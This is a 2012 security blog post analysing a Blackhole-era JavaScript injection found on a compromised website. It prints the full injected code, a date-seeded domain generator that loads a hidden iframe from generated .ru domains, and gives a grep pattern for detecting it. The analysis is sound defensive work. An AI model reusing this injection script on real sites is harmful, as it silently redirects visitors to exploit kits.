Saturday, September 1, 2012

Pseudo Randoms Infector URL - An idea to grep it (a logical bug to be used)

A while ago we have the PseudoRandom infector spreader via Blackhole.
Lucky me to just bumped into one, I thought it was already wiped out clean.
Here's the story of it.
I got the hint of the infected url via spam by my own spam filter.
Here's the url:
hxxp://www.strow.es/proyectos/destacado.html
As usual fetch it:
--03:48:46-- hxxp://www.strow.es/proyectos/destacado.html => `destacado.html' Resolving www.strow.es... 212.59.199.22 Connecting to www.strow.es|212.59.199.22|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 22,808 (22K) [text/html] 100%[====================================>] 22,808 29.32K/s 03:48:48 (29.25 KB/s) - `destacado.html' saved [22808/22808]
Let's see the timestamp of it...
-rwx------ 1 r00t b33r 22808 Aug 8 02:29 destacado.html
↑Ah, the old infected files who got leftover.. is a common HTML file, nothing special except it was injected by JavaScript, the code was after the tag like below: You can see the code in pastebin --->>>>[HERE] This is actually a PseudoRandom JS/Code with the eval() value below, of course is not as per it is.. you cannot run it by paste it.
function nextRandomNumber(){ var hi = this .seed / this .Q; var lo = this .seed % this .Q; var test = this .A * lo - this .R * hi; if (test > 0){ this .seed = test; } else { this .seed = test + this .M; } return (this .seed * this .oneOverM); } function RandomNumberGenerator(unix){ var d = new Date(unix * 1000); var s = Math.ceil(d.getHours() / 3); this .seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math. round(s * 0xFFF)); this .A = 48271; this .M = 2147483647; this .Q = this .M / this .A; this .R = this .M % this .A; this .oneOverM = 1.0 / this .M; this .next = nextRandomNumber; return this ; } function createRandomNumber(r, Min, Max){ return Math.round((Max - Min) * r.next() + Min); } function generatePseudoRandomString(unix, length, zone){ var rand = new RandomNumberGenerator(unix); var letters = "buaxoqeriqwkgfkdyenzossqlxfqayvpr".split(''); var str = ''; for (var i = 0; i < length; i ++ ){ str += letters[createRandomNumber(rand, 0, letters.length - 1)]; } return str + '.' + zone; } setInterval(function (){ try { if (typeof iframeWasCreated == "undefined"){ var unix = Math.round( + new Date()/ 1000); var domainName = generatePseudoRandomString(unix, 16, 'ru'); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "hxxp://" + domainName + "/in.cgi?15"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); iframeWasCreated = true; } } catch (e){ iframeWasCreated = undefined; } } , 100);
The paste of code is in here===>>>>[HERE] Well this will lead you to the below landing page:
hxxp://xkqaiqqirreqaqwd.ru/in.cgi?15
↑But don't get upset since nothing is in there anymore ;-) My point is to you to see what they code in PseudoRandom. See the code well and and you know how it works. The stupid thing of using PseudoRandom is there is no "really" random urls, You have to leave something to be merged as url. For the case of this sample is easy to grep "/in.cgi?" and see what happened in Domain List.